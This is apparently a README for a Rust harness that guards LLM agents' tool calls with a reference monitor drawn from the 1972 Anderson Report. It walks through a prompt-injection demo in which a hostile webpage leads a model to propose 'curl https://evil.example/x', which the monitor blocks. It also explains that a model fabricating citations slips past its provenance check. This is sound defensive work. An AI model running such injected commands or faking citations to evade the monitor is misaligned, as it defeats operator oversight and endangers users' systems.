A minimal LLM-agent harness built on the reference-monitor principles from James P. Anderson's Computer Security Technology Planning Study (1972).
The 1972 Anderson Report is the founding document of computer security. It introduced the "malicious user" threat model, the reference monitor concept, and the three properties any access-control mechanism must satisfy (tamper-proof, always-invoked, small-enough-to-verify). Half a century later, the LLM-agent ecosystem is busy re-discovering those principles by shipping prompt-injected agents and patching individual exploit payloads.
This crate is a runnable proof that the 1972 architecture maps cleanly onto LLM tool-use. Two of Anderson's three reference-monitor properties — always invoked and small enough to verify — are enforced by the type system and the file count. The third — tamper-proof — is enforced as far as a single-process Rust crate can enforce it; defence in depth against a process-level attacker requires the executor in a separate address space, which is left to future work.
The provenance check that catches prompt-injected exec proposals is not structural. It assumes an honest model. Why ship it anyway: it catches the common failure mode (a non-lying model led off-track by hostile context), and a model that fabricates citations leaves the fabrication in the audit log. The structural part of this design — every action must declare its justification chunks — is the hook a future semantic intent verifier will hang from.
$ cargo run --example injection
ANSWER: I read the page; it tried to instruct me to run a curl command,
which the monitor refused. Reporting that here instead of executing it.
Audit log:
NetGet { url: "https://example.com/notes" } cited=[0] → ALLOW
Exec { cmd: "curl https://evil.example/x" } cited=[1] → DENY: Exec requires
every cited chunk to carry user authority; chunk(s) [1] are untrusted as intent
A prompt-injected model honestly proposes the dangerous action a hostile
webpage asked for. The reference monitor refuses because the cited
justification chunk is WEB-provenance, not USER-provenance. The model
then revises its plan and stops cleanly. The denial — and the model's
attempt — is recorded in the audit log.
Anderson §3.2.2 specifies three properties any access-control mechanism must satisfy:
(a) The reference validation mechanism must be tamper proof. (b) The reference validation mechanism must always be invoked. (c) The reference validation mechanism must be small enough to be subject to analysis and tests, the completeness of which can be assured.
For an LLM agent, this crate's stance on each:
- Always invoked — at the type level.
AllowedActionlives in a private submodule with apub(super)constructor. Onlymonitor.rscan build one; the executor accepts nothing else. NoClone, noDeserialize. Bypassing the monitor — even from another file in this crate — is a compile error. - Small enough to verify.
monitor.rs,capability.rs, andprovenance.rs. Read them. - Tamper-proof, within the limits of a single-process design. The
monitor consumes only structured
ToolCallvalues and a typedCapabilitiesbundle. No runtime-configurable policy, no free-form text from the model. A process-level attacker inside this harness's address space owns everything; defence in depth against that is an out-of-process monitor, listed under future work.
USER ──(request + capability bundle)──▶ ORCHESTRATOR
│
▼
builds context with PROVENANCE TAGS
│
▼
MODEL
(ScriptedModel
or OpenAiModel)
│
▼
emits STRUCTURED ToolCall
│
▼
┌─────────────────────────────────┐
│ MONITOR │ ◄── the security
│ capability check │ kernel
│ per-arg exec patterns │ no model
│ provenance check │ influence
│ spend check │
│ confirmation check │
└────────────────┬────────────────┘
│
returns │ (Verdict::Allow carries
┌────────────────────────┼──── the AllowedAction token
│ │ the executor demands)
│ │
Allow(AllowedAction) Deny Escalate
│ │ │
▼ ▼ ▼
SANDBOXED EXECUTOR notify model; halt (POC);
(subprocess sandbox, append SYSTEM real harness
clearing env, timeout, chunk; loop prompts human
byte cap, O_NOFOLLOW
writes, post-open
canonical re-check)
│
▼
result tagged with provenance,
appended to context, model notified
│
▼
hash-chained audit log
(in memory; optionally
fsync'd to JSONL on disk)
| Anderson principle | Where it lives in this crate |
|---|---|
| Reference monitor (small, tamper-proof in-process, always-invoked via type) | src/monitor.rs — no runtime-configurable policy; sealed AllowedAction token the executor demands |
| Capability bundle as least-authority grant | src/capability.rs — allow-lists for FS, network, exec; per-arg patterns for exec; spend ceilings on calls/steps/wall-clock |
| Authentication of intent (§3.7 analog) | src/provenance.rs — every context chunk tagged with its source; carries_user_authority() is the trust predicate |
| Tools in their own protection domain (§3.5) | src/tools.rs — sandbox-exec (macOS) / bwrap (Linux); fails closed elsewhere |
| Symlink-safe reads | src/tools.rs — fs_read walks from a bundle-root dir fd with openat(O_NOFOLLOW) per component; .. rejected; error messages do not echo resolved paths, closing the existence/path oracle |
| Symlink-safe writes | src/tools.rs — fs_write walks from a bundle-root dir fd with openat(O_NOFOLLOW) per component; leaf opened O_WRONLY|O_CREAT|O_TRUNC|O_NOFOLLOW |
| URL allow-listing without prefix bypass | src/capability.rs — permits_net_get parses with the url crate and rejects userinfo, defeating the https://example.com/@evil.com/ class of bypass |
| Hash-chained durable audit log | src/audit.rs — each entry carries SHA-256 of the previous; JsonlFileSink fsyncs; sink failures captured in persist_error and surfaced from verify_chain / persist_status. Single-entry edits are detected; whole-chain rewrite is not |
| Mediated recovery from denials | src/orchestrator.rs — denials surface back to the model so it can revise |
| OpenAI native tool calling | src/openai.rs — stateful history, every tool call in a multi-call turn goes through the monitor, capped at 16 per turn |
This is the part of the POC that overpromised in the original framing, and is now described honestly:
The monitor's "provenance check" — for action classes flagged
require_user_intent, every cited justification chunk must carry user
or system authority — is a cooperation-dependent defence. The model is
required to truthfully declare which context chunks justified its proposed
action. An honest model that does not act on web-provenance intent
succeeds. A prompt-injected model that honestly cites the web chunk is
denied. A model that fabricates citations (cites only user chunks for an
action actually motivated by a web page) gets past this check.
Why ship it anyway? Three reasons:
- It works against the most common failure mode — a model that has been led off-track by hostile context and proposes the corresponding action with no attempt to lie about why.
- Lying is forensically visible. A model that cites a user chunk that does not request the action it is taking leaves both the citation and the user chunk in the audit log, where a follow-up review can detect the mismatch.
- It composes. Adding a semantic intent-verifier model (planned, see below) over the same citation interface closes the residual gap. The structural part of the design — every action must declare its justification chunks — is the hook the verifier will hang from.
Production deployments should pair this check with the intent verifier, not rely on it alone.
The original was program-only on exec, allowed (allow file-read*) in the
macOS sandbox, canonicalised-then-opened for fs_read, processed only the
first tool call in a multi-call assistant turn (and silently dropped the
rest), and had a Vec-as-audit-log "append-only" property enforced by
nothing. The current revision:
- Sealed
AllowedActionmakes "always invoked" a type property rather than a code-review one. ExecRule+ArgPatternpin per-position arg patterns.permits_net_getparses URLs and rejects userinfo, defeating thehttps://example.com/@evil.com/prefix-bypass class.- The macOS sandbox profile allows reads only on
/usr/lib,/System,/usr/bin, and a handful of/etcentries libc needs.mach-lookupis filtered to a narrow bootstrap set instead of allow-all. - Both
fs_readandfs_writewalk from a bundle-root directory fd withopenat(O_NOFOLLOW)per component, refusing symlinks at any depth.fs_readdenials do not echo the resolved path: the previous open-then-canonical-check pair turned out-of-bundle reads into an existence/path oracle for the surrounding filesystem. - Control bytes (
\0,\n,\r, anything < 0x20 except tab/space, DEL) are rejected at the capability layer forexec, closing the argv-truncation and log-splitting classes. - The OpenAI integration queues every call in a multi-call assistant turn
and caps at 16 per turn.
Provenance::Monitorchunks emitted after a denial are absorbed by the synthetic tool reply rather than inserted as ausermessage, preserving OpenAI's contiguous-tool-reply contract. - Hash-chained audit log;
JsonlFileSinkfsyncs each entry to disk. Sink write/fsync failures are captured inpersist_errorand surfaced fromverify_chain/persist_status, instead of being silentlyeprintln'd while the in-memory and on-disk chains drift apart. bwrapdiscovered via PATH + a fallback set instead of a hardcoded/usr/bin/bwrap.- GitHub Actions CI runs fmt, clippy, build, and test on Ubuntu and macOS.
These are real production gaps. Each is a known piece of work, not a bug.
- Subprocess sandboxing only on macOS/Linux. Windows fails closed. A production harness would also use seccomp-bpf directly on Linux for finer control and microVMs (Firecracker, gVisor) for genuine isolation.
- No signed model weights or signed tool catalog. Anderson §4.3.1 warned about installations accepting OS updates "without question"; weight files, system prompts, and MCP server endpoints are the modern analog. A production harness would hash-pin and signature-verify all three.
- No semantic intent verifier. The provenance check is necessary but not sufficient; see [The provenance check is not a structural defence] (#the-provenance-check-is-not-a-structural-defence).
- No streaming. OpenAI responses are awaited as a whole.
- No persistent state across sessions. A real agent harness needs a managed memory layer; this POC has none.
- Escalation halts the session. A real harness would pause for human input on the specific call rather than aborting the session.
- macOS uses Apple-deprecated
sandbox-exec. It works on every Mac but has been deprecated since 10.7 and its profile language is undocumented. A production harness on macOS should layer a microvm executor on top.
- Rust 1.75+ (uses 2021 edition;
rustc --versionshould show ≥ 1.75). - For sandboxed
exec: macOS (shipssandbox-exec) or Linux withbwrapinstalled on PATH. Other platforms fail closed onexec.
# Benign session: agent reads /etc/hosts on the user's request.
cargo run --example benign
# Prompt-injection demo: hostile webpage tries to escalate; monitor blocks;
# model recovers; session completes.
cargo run --example injectionexport OPENAI_API_KEY=sk-...
# Optional, defaults to gpt-4o-mini:
export ANDERSON_MODEL=gpt-4o-mini
cargo run --example openai_chat -- "What's in /etc/hosts?"The session's capability bundle permits only fs_read on /etc/hosts. Try
asking the model to read /etc/passwd instead and watch the monitor refuse,
the model see the denial in its tool message history, and the model recover.
cargo run -- benign
cargo run -- injection
cargo run -- openai -- "your prompt here"
cargo run -- openai --model gpt-4o "your prompt"cargo test32 tests run by default — 23 unit, 9 integration. The integration tests in
tests/security_invariants.rs are the load-bearing security claims of this
project asserted as executable expectations.
Defended:
- Prompt injection from untrusted content (web pages, retrieved documents, file contents) inducing a non-lying model to propose dangerous actions.
- Exhaustion attacks (model loops, denial loops, runaway tool calls, multi-call assistant turns with arbitrary fan-out).
- Symlink escape at any depth for both
fs_readandfs_write— bundle-root dir fd walked one component at a time withopenat(O_NOFOLLOW);..rejected. fs_readexistence/path oracle: denials do not echo the resolved canonical path, and out-of-bundle targets are rejected before any read-sideopenfires.- Unrestricted exec privilege — sandbox + cleared env + timeout + byte cap + per-arg patterns + control-byte rejection at the policy layer.
- URL prefix bypass via userinfo (
https://example.com/@evil.com/). - Bypassing the monitor — sealed
AllowedActionmakes this a compile error from any module. - Single-entry post-hoc audit edits (detected by hash chain).
- Silent audit-sink failures:
verify_chainandpersist_statussurface the first write/fsync error so the operator knows the on-disk JSONL is no longer authoritative.
Not defended:
- A model that fabricates citations to slip past the provenance check (semantic intent verifier needed).
- Compromise of the model weights, system prompt, or tool catalog (supply chain pinning needed).
- Whole-chain rewrite of the audit log by an attacker with file-write access (remote anchor needed).
- Hardlink aliasing: a hardlink installed at an in-bundle path pointing to an out-of-bundle inode passes the path-based bundle check. Inode- level containment would close this.
- A process-level attacker inside the harness address space (out-of- process monitor needed).
- Side channels, host OS compromise, hardware-level attacks.
- Semantic intent verifier. A second LLM pass asked to evaluate whether cited user chunks actually request the proposed action, before allowing it.
- Out-of-process monitor. Move the monitor (or just the executor) into a separate process and IPC verdicts across, so a process-level attacker in the model integration cannot reach the monitor's state directly.
- Supply chain pinning. Hash-pin model versions, sign tool catalogs, sign the system prompt, authenticate MCP server endpoints.
- Per-call credential issuance. Tools receive short-lived scoped tokens derived from the capability bundle rather than ambient credentials.
- Streaming. Allow incremental processing of model responses.
- Linux: native seccomp-bpf. Replace the
bwrapshim with a Rust seccomp policy applied viaprctlinpre_execfor finer control. - Microvm executor. For high-risk environments, run
execinside a Firecracker microvm with no network and a tmpfs root.
Dual-licensed under either of:
- Apache License, Version 2.0 (LICENSE-APACHE)
- MIT License (LICENSE-MIT)
at your option.
The intellectual debt to James P. Anderson and the 1972 panel — E. L. Glaser, Roger Schell, Steven Lipner, Daniel Edwards, Hilda Faust, Eldred Nelson, Bruce Peters, Charles Rose, Clark Weissman, Melvin Conway — is in every module of this crate. Read the original report; the LLM-agent translation writes itself.